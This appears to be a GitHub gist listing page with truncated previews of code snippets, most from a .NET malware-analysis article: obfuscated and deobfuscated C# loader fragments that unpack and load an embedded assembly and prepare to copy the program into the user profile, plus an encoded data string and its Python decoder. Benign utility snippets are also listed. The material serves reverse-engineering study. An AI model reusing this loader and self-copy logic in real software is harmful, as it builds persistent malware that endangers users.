jdferrell3
jdferrell3
/ passthru.cs
Last active
October 4, 2017 20:29
Simple C# code to execute another application
View passthru.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace passthru | |
| { | |
| class Program | |
| { |
jdferrell3
/ dotnet_malware_article_obfuscated_full.cs
Last active
March 9, 2018 02:27
View dotnet_malware_article_obfuscated_full.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] HA36XMPY) | |
| { | |
| int num = 5; | |
| string text; | |
| string a; | |
| string location; | |
| byte[] xnnXVZCo; | |
| Assembly assembly; | |
| string a2; | |
| for (;;) |
jdferrell3
/ dotnet_malware_article_obfuscated_partial.cs
Last active
March 9, 2018 02:30
View dotnet_malware_article_obfuscated_partial.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] HA36XMPY) | |
| { | |
| int num = 5; | |
| string text; | |
| string a; | |
| string location; | |
| byte[] xnnXVZCo; | |
| Assembly assembly; | |
| string a2; | |
| for (;;) |
jdferrell3
/ dotnet_malware_article_convert_resource.cs
Created
March 9, 2018 02:39
View dotnet_malware_article_convert_resource.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static void Main() | |
| { | |
| try | |
| { | |
| //IntPtr fResource = FindResource(new IntPtr(0), new IntPtr(130), new IntPtr(23)); | |
| //uint sResource = SizeofResource(new IntPtr(0), fResource); | |
| //IntPtr lResource = LoadResource(new IntPtr(0), fResource); | |
| //IntPtr dResource = LockResource(lResource); | |
| //CtNmG = new byte[sResource]; |
jdferrell3
/ dotnet_malware_article_deobfuscated.cs
Last active
March 9, 2018 03:53
View dotnet_malware_article_deobfuscated.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static void pwS3x7Sg(string[] args) { | |
| Assembly executingAssembly = Assembly.GetExecutingAssembly(); | |
| byte[] xnnXVZCo = rYChEj24.m861PYDG(executingAssembly); | |
| byte[] xnnXVZCo2 = rYChEj24.Q8sHxNtH(executingAssembly); | |
| Assembly assembly = Assembly.Load(rYChEj24.ygv4ageb(xnnXVZCo2)); | |
| string a = DFsEYbtO.smethod_1(293); | |
| string a2 = DFsEYbtO.smethod_1(302); | |
| string location = Assembly.GetEntryAssembly().Location; | |
| string text = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + DFsEYbtO.smethod_1(311) + Path.GetFileName(location); | |
| if (a2 == DFsEYbtO.smethod_1(316) && !File.Exists(text)) { |
jdferrell3
/ dotnet_malware_article_decode.py
Created
June 6, 2018 16:27
View dotnet_malware_article_decode.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| encoded_datastring = "pvlkb%V|vq`h>\b\u000fpvlkb%V|vq`h+LJ>\b\u000fpvlkb%V|vq`h+Q`}q>\b\u000fpvlkb%V|vq`h+W`ci`fqljk>\b\u000fpvlkb%V|vq`h+Qmw`dalkb>\b\u000fpvlkb%V|vq`h+Wpkqlh`+Lkq`wjuV`wslf`v>\b\u000fpvlkb%V|vq`h+Awdrlkb>\b\u000f\b\u000fkdh`vudf`%HBfrR}vhhbK_\b\u000f~\b\u000f\fupgilf%fidvv%lAu}~upgilf%sjla%wGKc-,~\b\u000fvmjwq%Mh|p%8%(43457>%\u000f%g|q`^X%Mh|pMh|p%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'Mh|p',>cijdq%FpJF%8%6+017104@(5<C>%\u000fvmjwq%`rsV%8%44270>%\u000f%g|q`^X%`rsV`rsV%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'`rsV',>pijkb%nhgG%8%47=7=32151133040<>%\u000f\b\u000fxupgilf%sjla%|fB@-,~\b\u000flkq%U_rI%8%176<=0>%\u000frmli`-U_rI%88%176<=0,~\b\u000fU_rI%8%U_rI%.%702154>\b\u000fxijkb%SbNm%8%4<74=04541520<522>%\u000flkq%VrnW%8%31445=22>%\u000flc-VrnW%88%45272<,~\b\u000fVrnW%8%VrnW%.%713440>\b\u000fxvqwlkb%rLBA%8%'IjcP'>%\u000f%Fjkvji`+Rwlq`Ilk`-rLBA,>\b\u000fxupgilf%sjla%QNFF-,~\b\u000fijkb%U@WV%8%3573524<6<<5265<=>%\u000fvmjwq%|]qt%8%421<7>%\u000f%g|q`^X%|]qt|]qt%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'|]qt',>pijkb%FfQs%8%24< |
jdferrell3
/ dotnet_malware_article_decoded.cs
Created
June 6, 2018 16:37
View dotnet_malware_article_decoded.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Reflection; | |
| using System.Threading; |
View bgzip.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gzip | |
| import base64 | |
| import StringIO | |
| # python bgzip.py | |
| # H4sIAErhF1wC/8tIzcnJBwCGphA2BQAAAA== | |
| # hello | |
| def gzip_and_base64(s): | |
| out = StringIO.StringIO() |
jdferrell3
/ gist:6b2be0386caff742fbc1647714d7a21a
Created
December 31, 2018 19:21
Setup Python virtualenv on Ubuntu
View gist:6b2be0386caff742fbc1647714d7a21a
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get install python3-venv | |
| python3 -m venv {env_dir} |
jdferrell3
/ DisplayPath.cpp
Created
April 4, 2019 23:38
View DisplayPath.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef UNICODE | |
| #define UNICODE | |
| #endif | |
| #include<windows.h> | |
| int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow) | |
| { | |
| wchar_t path[256]; | |
| DWORD size = 256; |
OlderNewer